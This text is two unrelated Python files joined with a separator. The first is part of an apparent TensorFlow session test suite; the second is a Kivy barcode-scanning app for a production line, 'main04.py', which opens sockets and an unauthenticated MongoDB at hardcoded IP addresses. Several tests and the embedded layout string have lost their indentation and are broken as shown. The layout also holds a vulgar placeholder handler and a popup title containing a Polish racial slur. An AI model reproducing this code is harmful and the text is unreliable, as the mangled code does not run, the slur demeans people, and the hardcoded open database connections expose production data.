for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
  def testParallelRun(self):
    """100 threads can concurrently eval the same tensor in one session."""
    with session.Session() as sess:
      c = constant_op.constant(5.0)
      ev = threading.Event()
      def run_step():
        # All threads block until the event fires, maximizing concurrency.
        ev.wait()
        val = c.eval(session=sess)
        self.assertEqual(val, 5.0)
      threads = [self.checkedThread(target=run_step) for _ in range(100)]
      for t in threads:
        t.start()
      ev.set()
      for t in threads:
        t.join()
  def testRunFeedDict(self):
    """feed_dict accepts tensors, names, lists, and nested tuple keys."""
    with session.Session() as s:
      x = array_ops.zeros([2])
      y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
      self.assertAllEqual(y, 2 * np.ones(2))
      y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
      self.assertAllEqual(y, 2 * np.ones(2))
      y = s.run(2 * x, feed_dict={x: [1, 1]})
      assert (y == 2 * np.ones(2)).all()
      # Test nested tuple keys
      z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
           (array_ops.zeros([2]),))
      result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
      values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
      result_value = s.run(result, feed_dict={z: values})
      self.assertAllEqual(result_value[0], 2 * np.ones(2))
      self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
      self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals(
'versions { producer: %d min_consumer: %d }' % (
versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
  def testUseAfterClose(self):
    """Running on a closed session raises RuntimeError with a clear message."""
    with session.Session() as sess:
      c = constant_op.constant(5.0)
      self.assertAllEqual(sess.run(c), 5.0)
    # The `with` block has closed the session; further runs must fail.
    with self.assertRaisesWithPredicateMatch(
        RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
      sess.run(c)
  def testUseAfterCloseConcurrent(self):
    """Closing a session while another thread runs it raises in that thread."""
    with session.Session() as sess:
      c = constant_op.constant(5.0)
      self.assertAllEqual(sess.run(c), 5.0)
      def update_thread():
        # Loop until the main thread's close() makes run() raise.
        with self.assertRaisesWithPredicateMatch(
            RuntimeError,
            lambda e: 'Attempted to use a closed Session.' in str(e)):
          while True:
            sess.run(c)
      t = threading.Thread(target=update_thread)
      t.start()
      time.sleep(0.1)
      sess.close()
      t.join()
  def testUseEmptyGraph(self):
    """Running with an empty fetch list on an empty graph raises RuntimeError."""
    with session.Session() as sess:
      with self.assertRaisesWithPredicateMatch(
          RuntimeError, lambda e: 'The Session graph is empty.' in str(e)):
        sess.run([])
def testNotEntered(self):
    """A tensor cannot eval() via a session that was never made default."""
    # pylint: disable=protected-access
    self.assertEqual(ops._default_session_stack.get_default(), None)
    # pylint: enable=protected-access
    with ops.device('/cpu:0'):
        sess = session.Session()
        c_1 = constant_op.constant(5.0)
        with sess.graph.as_default():
            c_2 = constant_op.constant(5.0)
        self.assertEqual(c_1.graph, c_2.graph)
        self.assertEqual(sess.run(c_2), 5.0)
        # `sess` is not entered as default, so implicit eval() has no session.
        with self.assertRaisesWithPredicateMatch(
            ValueError, lambda e: 'No default session is registered.' in str(e)):
            c_2.eval()

def testInteractive(self):
    """InteractiveSession installs itself as default, so eval() works directly."""
    with ops.device('/cpu:0'):
        sess = session.InteractiveSession()
        a = constant_op.constant(1.0, shape=[1, 2])
        b = constant_op.constant(2.0, shape=[2, 3])
        c = math_ops.matmul(a, b)
        self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
        d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
        e = math_ops.matmul(c, d)
        self.assertAllEqual([[24.0]], e.eval())
        sess.close()
def testInteractivePlacePrunedGraph(self):
    """An InteractiveSession places only the pruned subgraph it actually runs."""
    sess = session.InteractiveSession()
    # Build a graph that has a bad op in it (no kernel).
    #
    # This test currently does not link in any GPU kernels,
    # which is why placing this is invalid. If at some point
    # GPU kernels are added to this test, some other different
    # op / device combo should be chosen.
    with ops.device('/gpu:0'):
        a = constant_op.constant(1.0, shape=[1, 2])
    b = constant_op.constant(1.0, shape=[1, 2])
    # Only run the valid op, this should work.
    b.eval()
    with self.assertRaises(errors.InvalidArgumentError):
        a.eval()
    sess.close()

def testDefaultSessionPlacePrunedGraph(self):
    """A plain Session places the whole graph, so any unplaceable op fails run()."""
    sess = session.Session()
    # Build a graph that has a bad op in it (no kernel).
    #
    # This test currently does not link in any GPU kernels,
    # which is why placing this is invalid. If at some point
    # GPU kernels are added to this test, some other different
    # op / device combo should be chosen.
    with ops.device('/gpu:0'):
        _ = constant_op.constant(1.0, shape=[1, 2])
    b = constant_op.constant(1.0, shape=[1, 2])
    with self.assertRaises(errors.InvalidArgumentError):
        # Even though we don't run the bad op, we place the entire
        # graph, which should fail with a non-interactive session.
        sess.run(b)
    sess.close()
def testSharedGraph(self):
    """Two sessions over the same graph compute identical results."""
    with ops.Graph().as_default() as g, ops.device('/cpu:0'):
        a = constant_op.constant(1.0, shape=[1, 2])
        b = constant_op.constant(2.0, shape=[2, 3])
        c = math_ops.matmul(a, b)
    with session.Session(graph=g) as sess1:
        with session.Session(graph=g) as sess2:
            self.assertAllEqual(sess1.run(c), sess2.run(c))

def testDuplicatedInputs(self):
    """Fetching the same tensor twice in one run() returns it twice."""
    with session.Session() as sess:
        a = constant_op.constant(1.0, shape=[1, 2])
        b = constant_op.constant(2.0, shape=[1, 3])
        a_val, b_val, a2_val = sess.run([a, b, a])
        self.assertAllEqual(a_val, [[1.0, 1.0]])
        self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
        self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
    """Round-trips every supported dtype and shape through feed and fetch."""
    with session.Session() as sess:
        for dtype in [dtypes.float16,
                      dtypes.float32,
                      dtypes.float64,
                      dtypes.int32,
                      dtypes.uint8,
                      dtypes.int16,
                      dtypes.int8,
                      dtypes.int64,
                      dtypes.bool,
                      dtypes.complex64,
                      dtypes.complex128]:
            for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
                np_dtype = dtype.as_numpy_dtype
                feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
                out_t = array_ops.identity(feed_t)
                np_array = np.random.randint(-10, 10, shape)
                if dtype == dtypes.bool:
                    np_array = np_array > 0
                elif dtype == dtypes.complex64:
                    np_array = np.sqrt(np_array.astype(np_dtype))
                elif dtype == dtypes.complex128:
                    # BUG FIX: this branch previously re-tested complex64
                    # (copy-paste), so complex128 fell into the plain astype
                    # path and never exercised complex-valued (sqrt of
                    # negative) data.
                    np_array = np.sqrt(np_array.astype(np_dtype))
                else:
                    np_array = np_array.astype(np_dtype)
                self.assertAllEqual(np_array,
                                    sess.run(out_t, feed_dict={feed_t: np_array}))
                # Check that we can also get the feed back.
                self.assertAllEqual(np_array,
                                    sess.run(feed_t, feed_dict={feed_t: np_array}))
                # Also check that we can get both back.
                out_v, feed_v = sess.run([out_t, feed_t],
                                         feed_dict={feed_t: np_array})
                self.assertAllEqual(np_array, out_v)
                self.assertAllEqual(np_array, feed_v)
def testFeedError(self):
    """Feeding a tf.Tensor as a feed value raises TypeError on every path."""
    with session.Session() as sess:
        feed_t = array_ops.placeholder(dtype=dtypes.float32)
        out_t = array_ops.identity(feed_t)
        feed_val = constant_op.constant(5.0)
        with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
            sess.run(out_t, feed_dict={feed_t: feed_val})
        with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
            out_t.eval(feed_dict={feed_t: feed_val})
        with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
            out_t.op.run(feed_dict={feed_t: feed_val})

def testFeedPrecisionLossError(self):
    """Feeding int64-max into an int32 placeholder is rejected, not truncated."""
    with session.Session() as sess:
        largest_int64 = np.iinfo(np.int64).max
        feed_int_implicit_int32 = constant_op.constant(1)
        feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
        out_t = constant_op.constant(1.0)
        with self.assertRaisesRegexp(TypeError,
                                     'is not compatible with Tensor type'):
            sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
        with self.assertRaisesRegexp(TypeError,
                                     'is not compatible with Tensor type'):
            sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
    """String constants round-trip through fetch for all shapes, incl. empty."""
    with session.Session():
        for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
            size = 1
            for s in shape:
                size *= s
            c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
                              dtype=np.object).reshape(shape) if size > 0 else []
            c = constant_op.constant(c_list)
            self.assertAllEqual(c.eval(), c_list)

def testStringFeed(self):
    """String values round-trip through feed and fetch for all shapes."""
    with session.Session() as sess:
        for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
            size = 1
            for s in shape:
                size *= s
            c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
                              dtype=np.object).reshape(shape)
            feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
            c = array_ops.identity(feed_t)
            self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
            self.assertAllEqual(sess.run(feed_t, feed_dict={feed_t: c_list}),
                                c_list)
            c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
            self.assertAllEqual(c_v, c_list)
            self.assertAllEqual(feed_v, c_list)

def testStringFeedWithNullCharacters(self):
    """Embedded NUL bytes survive the feed/fetch round trip."""
    with session.Session():
        c_list = [b'\n\x01\x00', b'\n\x00\x01']
        feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
        c = array_ops.identity(feed_t)
        out = c.eval(feed_dict={feed_t: c_list})
        self.assertEqual(c_list[0], out[0])
        self.assertEqual(c_list[1], out[1])

def testStringFeedWithUnicode(self):
    """Unicode feeds come back as UTF-8 bytes, from lists and object arrays."""
    with session.Session():
        c_list = [u'\n\x01\x00', u'\n\x00\x01']
        feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
        c = array_ops.identity(feed_t)
        out = c.eval(feed_dict={feed_t: c_list})
        self.assertEqual(c_list[0], out[0].decode('utf-8'))
        self.assertEqual(c_list[1], out[1].decode('utf-8'))
        out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
        self.assertEqual(c_list[0], out[0].decode('utf-8'))
        self.assertEqual(c_list[1], out[1].decode('utf-8'))
def testInvalidTargetFails(self):
    """An unknown session target string raises NotFoundError."""
    with self.assertRaisesRegexp(
        errors.NotFoundError,
        'No session factory registered for the given session options'):
        session.Session('INVALID_TARGET')

def testFetchByNameDifferentStringTypes(self):
    """Ops named with str/unicode/bytes/raw strings are all fetchable by name."""
    with session.Session() as sess:
        c = constant_op.constant(42.0, name='c')
        d = constant_op.constant(43.0, name=u'd')
        e = constant_op.constant(44.0, name=b'e')
        f = constant_op.constant(45.0, name=r'f')
        # Tensor names are normalized to text regardless of input string type.
        self.assertTrue(isinstance(c.name, six.text_type))
        self.assertTrue(isinstance(d.name, six.text_type))
        self.assertTrue(isinstance(e.name, six.text_type))
        self.assertTrue(isinstance(f.name, six.text_type))
        self.assertEqual(42.0, sess.run('c:0'))
        self.assertEqual(42.0, sess.run(u'c:0'))
        self.assertEqual(42.0, sess.run(b'c:0'))
        self.assertEqual(42.0, sess.run(r'c:0'))
        self.assertEqual(43.0, sess.run('d:0'))
        self.assertEqual(43.0, sess.run(u'd:0'))
        self.assertEqual(43.0, sess.run(b'd:0'))
        self.assertEqual(43.0, sess.run(r'd:0'))
        self.assertEqual(44.0, sess.run('e:0'))
        self.assertEqual(44.0, sess.run(u'e:0'))
        self.assertEqual(44.0, sess.run(b'e:0'))
        self.assertEqual(44.0, sess.run(r'e:0'))
        self.assertEqual(45.0, sess.run('f:0'))
        self.assertEqual(45.0, sess.run(u'f:0'))
        self.assertEqual(45.0, sess.run(b'f:0'))
        self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
    """A session rejects tensors/ops that belong to a different graph."""
    with ops.Graph().as_default() as g_1:
        c_1 = constant_op.constant(1.0, name='c')
    with ops.Graph().as_default() as g_2:
        c_2 = constant_op.constant(2.0, name='c')
    # Same op name in both graphs, so name lookup alone cannot disambiguate.
    self.assertEqual('c', c_1.op.name)
    self.assertEqual('c', c_2.op.name)
    with session.Session(graph=g_1) as sess_1:
        self.assertEqual(1.0, sess_1.run(c_1))
        with self.assertRaises(ValueError):
            sess_1.run(c_2)
        with self.assertRaises(ValueError):
            sess_1.run(c_2.op)
    with session.Session(graph=g_2) as sess_2:
        with self.assertRaises(ValueError):
            sess_2.run(c_1)
        with self.assertRaises(ValueError):
            sess_2.run(c_1.op)
        self.assertEqual(2.0, sess_2.run(c_2))
def testPartialRun(self):
    """partial_run feeds values incrementally across one setup handle."""
    with session.Session() as sess:
        a = array_ops.placeholder(dtypes.float32, shape=[])
        b = array_ops.placeholder(dtypes.float32, shape=[])
        c = array_ops.placeholder(dtypes.float32, shape=[])
        r1 = math_ops.add(a, b)
        r2 = math_ops.mul(r1, c)
        h = sess.partial_run_setup([r1, r2], [a, b, c])
        res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
        self.assertEqual(3, res)
        temp = res * 17
        res = sess.partial_run(h, r2, feed_dict={c: temp})
        self.assertEqual(153, res)
        # Call again on the same graph.
        h2 = sess.partial_run_setup([r1, r2], [a, b, c])
        res = sess.partial_run(h2, r1, feed_dict={a: 1, b: 2})
        self.assertEqual(3, res)
        temp = res * 18
        res = sess.partial_run(h2, r2, feed_dict={c: temp})
        self.assertEqual(162, res)

def testPartialRunIncomplete(self):
    """A partial_run handle may be abandoned without fetching every target."""
    with session.Session() as sess:
        a = array_ops.placeholder(dtypes.float32, shape=[])
        b = array_ops.placeholder(dtypes.float32, shape=[])
        c = array_ops.placeholder(dtypes.float32, shape=[])
        r1 = math_ops.add(a, b)
        r2 = math_ops.mul(r1, c)
        h = sess.partial_run_setup([r1, r2], [a, b, c])
        res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
        self.assertEqual(3, res)

def testConcurrentPartialRun(self):
    """Two partial_run handles on one session stay independent."""
    with session.Session() as sess:
        a = array_ops.placeholder(dtypes.float32, shape=[])
        b = array_ops.placeholder(dtypes.float32, shape=[])
        c = array_ops.placeholder(dtypes.float32, shape=[])
        r1 = math_ops.add(a, b)
        r2 = math_ops.mul(r1, c)
        h1 = sess.partial_run_setup([r1], [a, b, c])
        h2 = sess.partial_run_setup([r1, r2], [a, b, c])
        res = sess.partial_run(h1, r1, feed_dict={a: 1, b: 2})
        self.assertEqual(3, res)
        temp = res * 19
        res = sess.partial_run(h2, r1, feed_dict={a: temp, b: 9})
        self.assertEqual(66, res)
        res = sess.partial_run(h2, r2, feed_dict={c: 7})
        self.assertEqual(462, res)

def testManyPartialRun(self):
    """A long chain of placeholders can be driven one step at a time."""
    with session.Session() as sess:
        steps = 200
        inputs = []
        outputs = []
        a = constant_op.constant(2.0, dtypes.float32)
        for i in xrange(steps):
            inputs.append(array_ops.placeholder(dtypes.float32, shape=[]))
            a = math_ops.mul(a, inputs[i])
            outputs.append(a)
        h = sess.partial_run_setup(outputs, inputs)
        for i in xrange(steps):
            res = sess.partial_run(h, outputs[i], feed_dict={inputs[i]: 1.0})
            self.assertEqual(2.0, res)
        # The same graph still works with a normal (non-partial) run.
        feed_dict = {}
        for i in xrange(steps):
            feed_dict[inputs[i]] = 1.0
        res = sess.run(outputs, feed_dict)
        self.assertEqual(steps, len(res))
        self.assertEqual(2.0, res[-1])

def testRunAndPartialRun(self):
    """run() and partial_run() on the same fetches agree."""
    with session.Session() as sess:
        a = constant_op.constant(2.0, dtypes.float32)
        b = a * 2
        c = b * 3
        r1 = sess.run([b, c])
        h = sess.partial_run_setup([b, c], [])
        r2 = sess.partial_run(h, [b, c])
        self.assertEqual(r1, r2)
def testFeedDictKeyException(self):
    """A plain string is not a valid feed_dict key."""
    with session.Session() as sess:
        a = constant_op.constant(1.0, dtypes.float32, name='a')
        with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'):
            sess.run(a, feed_dict={'a': [2.0]})

def testPerStepTrace(self):
    """step_stats are collected only when FULL_TRACE options are passed."""
    run_options = config_pb2.RunOptions(
        trace_level=config_pb2.RunOptions.FULL_TRACE)
    run_metadata = config_pb2.RunMetadata()
    with ops.device('/cpu:0'):
        with session.Session() as sess:
            sess.run(constant_op.constant(1.0))
            self.assertTrue(not run_metadata.HasField('step_stats'))
            sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
            self.assertTrue(not run_metadata.HasField('step_stats'))
            sess.run(constant_op.constant(1.0),
                     options=run_options,
                     run_metadata=run_metadata)
            self.assertTrue(run_metadata.HasField('step_stats'))
            self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)

def testRunOptionsRunMetadata(self):
    """All combinations of options/run_metadata arguments are accepted."""
    run_options = config_pb2.RunOptions(
        trace_level=config_pb2.RunOptions.FULL_TRACE)
    run_metadata = config_pb2.RunMetadata()
    with ops.device('/cpu:0'):
        with session.Session() as sess:
            # all combinations are valid
            sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
            sess.run(constant_op.constant(1.0), options=None,
                     run_metadata=run_metadata)
            self.assertTrue(not run_metadata.HasField('step_stats'))
            sess.run(constant_op.constant(1.0), options=run_options,
                     run_metadata=None)
            self.assertTrue(not run_metadata.HasField('step_stats'))
            sess.run(constant_op.constant(1.0), options=run_options,
                     run_metadata=run_metadata)
            self.assertTrue(run_metadata.HasField('step_stats'))
            self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
    """Shape-incompatible feeds and feeding non-feedable tensors both fail."""
    with session.Session() as sess:
        some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
        new_shape = constant_op.constant([2, 2])
        reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
        with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
            sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
        with self.assertRaisesRegexp(ValueError, 'may not be fed'):
            sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})

def testInferShapesFalse(self):
    """Without infer_shapes, graph_def nodes carry no _output_shapes attr."""
    with ops.Graph().as_default(), ops.device('/cpu:0'):
        a = constant_op.constant([[1, 2]])
        sess = session.Session()
        self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
        # Avoid lint error regarding 'unused' var a.
        self.assertTrue(a == a)

def testInferShapesTrue(self):
    """With infer_shapes=True, graph_def nodes carry an _output_shapes attr."""
    config = config_pb2.ConfigProto(
        graph_options=config_pb2.GraphOptions(infer_shapes=True))
    with ops.Graph().as_default(), ops.device('/cpu:0'):
        a = constant_op.constant([[1, 2]])
        sess = session.Session(config=config)
        self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
        # Avoid lint error regarding 'unused' var a.
        self.assertTrue(a == a)

def testBuildCostModel(self):
    """A cost graph is produced exactly on the configured build step."""
    run_options = config_pb2.RunOptions()
    config = config_pb2.ConfigProto(
        allow_soft_placement=True,
        graph_options=config_pb2.GraphOptions(build_cost_model=100))
    with session.Session(config=config) as sess:
        with ops.device('/gpu:0'):
            a = array_ops.placeholder(dtypes.float32, shape=[])
            b = math_ops.add(a, a)
            c = array_ops.identity(b)
            d = math_ops.mul(c, c)
        for step in xrange(120):
            run_metadata = config_pb2.RunMetadata()
            sess.run(d, feed_dict={a: 1.0},
                     options=run_options, run_metadata=run_metadata)
            if step == 99:
                self.assertTrue(run_metadata.HasField('cost_graph'))
            else:
                self.assertFalse(run_metadata.HasField('cost_graph'))
def testNonInteractiveSessionNesting(self):
    """Exiting default-session contexts out of order is an assertion error."""
    sess1 = session.Session()
    sess1_controller = sess1.as_default()
    sess1_controller.__enter__()
    sess2 = session.Session()
    sess2_controller = sess2.as_default()
    sess2_controller.__enter__()
    with self.assertRaisesRegexp(AssertionError, 'Nesting violated'):
        sess1_controller.__exit__(None, None, None)
    # pylint: disable=protected-access
    ops._default_session_stack.reset()

def testInteractiveSessionNesting(self):
    """InteractiveSessions may be created and discarded in any order."""
    sess1 = session.InteractiveSession()
    sess2 = session.InteractiveSession()
    del sess1
    del sess2

def testInvalidArgument(self):
    """Constructor argument types are validated with clear messages."""
    with self.assertRaisesRegexp(TypeError, 'target must be a string'):
        session.Session(37)
    with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'):
        session.Session(config=37)
    with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'):
        session.Session(graph=37)

def testTimeoutWithShortOperations(self):
    """Fast ops complete well within a generous operation timeout."""
    num_epochs = 5
    q = data_flow_ops.FIFOQueue(
        capacity=50, dtypes=[dtypes.int32], shapes=[()])
    enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
    # Use a 10-second timeout, which should be longer than any
    # non-blocking enqueue_many op.
    config = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
    with session.Session(config=config) as sess:
        for _ in range(num_epochs):
            sess.run(enqueue_op)
        self.assertEqual(sess.run(q.size()), num_epochs * 2)
if __name__ == '__main__':
googletest.main()
|
main04.py | from kivy.app import App
from kivy.uix.image import Image
from kivy.uix.button import Button
from kivy.uix.label import Label
from kivy.core.text import Label as ButtonText
from kivy.uix.image import Image
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.properties import NumericProperty
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.core.text import Label as CoreLabel
from kivy.uix.popup import Popup
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.lang import Builder
from kivy.clock import Clock
import math
import serial
import time
from pymongo import MongoClient
import datetime
import threading
import socket
# ---- module-level setup: runs at import time, blocks until services answer ----
# Give the network and backing services time to come up before connecting.
time.sleep(5)
#host = '213.32.89.50'
host = '192.168.1.200'
port = 6646  # change here !!! (per-station message port)
port2 = 6746  # change here !!!
# Two non-blocking TCP connections to the production server.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.setblocking(0)
s.settimeout(0)  # settimeout(0) also implies non-blocking; kept as in original
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host, port2))
s2.setblocking(0)
s2.settimeout(0)
print('connected to socket')
#client = MongoClient('mongodb://213.32.89.50:27017/')
client = MongoClient('mongodb://192.168.1.200:27017/')
print('connected to mongodb')
db = client['production']
staff = db['staff']
second_category = db['nd2category']
comments = db['comments']
# One collection per production stage.
collection_00 = db['preparing']
collection_01 = db['pressing']
collection_02 = db['cutting']
collection_03 = db['sanding']
collection_04 = db['finishing']
collection_05 = db['stock']
# Work queues between stages.
collection_topress = db['topress']
collection_tocut = db['tocut']
collection_tosand = db['tosand']
collection_tofinish = db['tofinish']
collection_tostock = db['stock']
collection_evermade = db['evermade']
collection_missingcodes = db['missingcodes']
collection_workertime = db['workertime']
print('connected to mongodb')
# Barcode-scanner Arduino: try the Windows COM port first, then Linux USB.
try:
    MasterModule = serial.Serial('COM3', 115200)
except Exception:  # narrowed from bare `except:` so Ctrl-C is not swallowed
    MasterModule = serial.Serial('/dev/ttyUSB0', 115200)
print('connected to arduino at: %s' % MasterModule.name)
time.sleep(1)
# ---- mutable global state shared by the UI clock handlers below ----
machine_state = 0
code = ["", "", "", "", "", "", "", "", "", ""]
code_win = ["", "", "", "", "", "", "", "", "", "","", "", "", "", "", "", "", "", "", ""]
label_list = ['barcode1', 'barcode2', 'barcode3', 'barcode4', 'barcode5', 'barcode6', 'barcode7', 'barcode8',
              'barcode9', 'barcode10']
lis_window = ['cut00', 'cut01', 'cut02', 'cut03', 'cut04', 'cut05', 'cut06', 'cut07', 'cut08', 'cut09',
              'cut10', 'cut11', 'cut12', 'cut13', 'cut14', 'cut15', 'cut16', 'cut17', 'cut18', 'cut19',
              'cut20', 'cut21', 'cut22', 'cut23', 'cut24', 'cut25', 'cut26', 'cut27', 'cut28', 'cut29',
              'cut30', 'cut31', 'cut32', 'cut33', 'cut34', 'cut35', 'cut36', 'cut37', 'cut38', 'cut39']
current_code = ""
current_time = ""
worker = ""
last_record = ""
b = 0
data = 0
send_zero = 0
read_code = ""
timestamp = ""
data_added = 0
comm_added = 0
comment_added = 0
sec = 0
com = 0
worker_time_start = ""
worker_time_stop = ""
code_tcp = ""
time_tcp = ""
message = ""
last_message = ""
Builder.load_string("""
<MainWindow>:
BoxLayout:
canvas.before:
Color:
rgba: 1,1,1, .80
Rectangle:
pos: root.pos
size: root.size
orientation: 'vertical'
color: (1,1,1,0)
orientation: 'vertical'
BoxLayout:
orientation: 'vertical'
BoxLayout:
canvas.before:
Color:
rgba: 0,0,0, 0.75
Rectangle:
pos: self.pos
size: self.size
orientation: 'horizontal'
size_hint: 1, .18
Label:
text: '[b]FINISH ROOM - 04[b]' # tu zmienic !!!
markup: 'True'
font_size: self.parent.width/20
Label:
size_hint: 0.3 , 1
Image:
source: 'logo.png'
size_hint: 0.5 , 1
Label:
size_hint: .1, 1
BoxLayout:
orientation: 'horizontal'
BoxLayout:
orientation: 'vertical'
size_hint: .9, 1
Label:
size_hint: 1, 0.4
Label:
text: '[b]SCANNED BARCODES[b]'
markup: 'True'
size_hint: 1, 1.2
font_size: self.parent.width/13
color: 0, .6156, .48235
Label:
size_hint: 1, 0.2
Label:
id: barcode1
text: ''
color: 0, 0, 0, 1
font_size: self.parent.width/19
Label:
id: barcode2
text: ''
color: 0, 0, 0, 0.95
font_size: self.parent.width/19
Label:
id: barcode3
text: ''
color: 0, 0, 0, 0.9
font_size: self.parent.width/19
Label:
id: barcode4
text: ''
color: 0, 0, 0, 0.85
font_size: self.parent.width/19
Label:
id: barcode5
text: ''
color: 0, 0, 0, 0.8
font_size: self.parent.width/19
Label:
id: barcode6
text: ''
color: 0, 0, 0, 0.75
font_size: self.parent.width/19
Label:
id: barcode7
text: ''
color: 0, 0, 0, 0.7
font_size: self.parent.width/19
Label:
id: barcode8
text: ''
color: 0, 0, 0, 0.65
font_size: self.parent.width/19
Label:
id: barcode9
text: ''
color: 0, 0, 0, 0.6
font_size: self.parent.width/19
Label:
id: barcode10
text: ''
color: 0, 0, 0, 0.55
font_size: self.parent.width/19
Label:
size_hint: 1, 0.5
Label:
size_hint: 0.01 , 1
BoxLayout:
orientation: 'vertical'
Label:
size_hint: 1, 0.7
Label:
id: last_code
text: '[b]-[b]'
markup: 'True'
color: 1,0,0, .5
font_size: self.parent.width/10
size_hint: 1 , .6
Label:
id: last_code_time
text: '[b]-[b]'
markup: 'True'
color: 1,0,0,.6
font_size: self.parent.width/10
size_hint: 1, 0.5
size_hint: 1 , .6
Label:
id: status
text: '[b]DISCONNECT[b]'
markup: 'True'
color: 0,0,0,.7
font_size: self.parent.width/12
halign: 'center'
valign: 'middle'
size_hint: 1 , .6
Label:
id: worker_label
text: '-'
font_size: self.parent.width/13
color: 0, .6156, .48235, 1
halign: 'center'
valign: 'middle'
size_hint: 1 , .6
Label:
size_hint: 1, .2
BoxLayout:
BoxLayout:
orientation: 'vertical'
size_hint: 1.2 ,1.1
Label:
size_hint: 1, 0.4
BoxLayout:
orientation: 'horizontal'
Label:
size_hint: .05 , 1
Button:
text: 'ADD COMMENTS'
font_size: self.parent.width/26
text_size: self.parent.width/4 , None
halign: 'center'
valign: 'middle'
background_color: 0, .6156, .48235
background_color: 0, .6156, .48235, 1
background_normal: ''
on_press: root.addcoment()
Label:
size_hint: .1 , 1
Button:
text: 'ADD 2nd CATEGORY'
font_size: self.parent.width/26
text_size: self.parent.width/5, None
halign: 'center'
valign: 'middle'
background_color: 0, .6156, .48235, 1
background_normal: ''
on_press: root.nd2category()
Label:
size_hint: .1 , 1
Button:
text: 'STOCK'
font_size: self.parent.width/26
background_color: 0, .6156, .48235, 1
background_normal: ''
on_press: root.show_info() # tu zmienic tylko dla 00
Label:
size_hint: .1 , 1
Button:
text: 'EXIT'
font_size: self.parent.width/26
text_size: self.parent.width/5, None
halign: 'center'
valign: 'middle'
background_color: 0, .6156, .48235, 1
background_normal: ''
on_press: dupa
Label:
size_hint: .05 , 1
Label:
text: 'COMMENT'
color: 0,0,0,1
size_hint: 1, 0.3
TextInput:
id: comment
size_hint: 1 , 0.6
Label:
size_hint: 1, 0.3
Label:
size_hint: .03, 1
<MessageWindow>:
size_hint: 0.5, 0.5
title_align: 'center'
title: 'WIADOMOSC DLA PANA MURZYNA'
BoxLayout:
Label:
id: messagetext
<InfoWindow>:
on_open: root.popup_count()
size_hint: 0.8, 0.8
title_align: 'center'
title: 'BOARDS TO FINISH' #tu zmienic
BoxLayout:
orientation: 'horizontal'
BoxLayout:
orientation: 'vertical'
Label:
text: root.board_name_list[0]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[1]
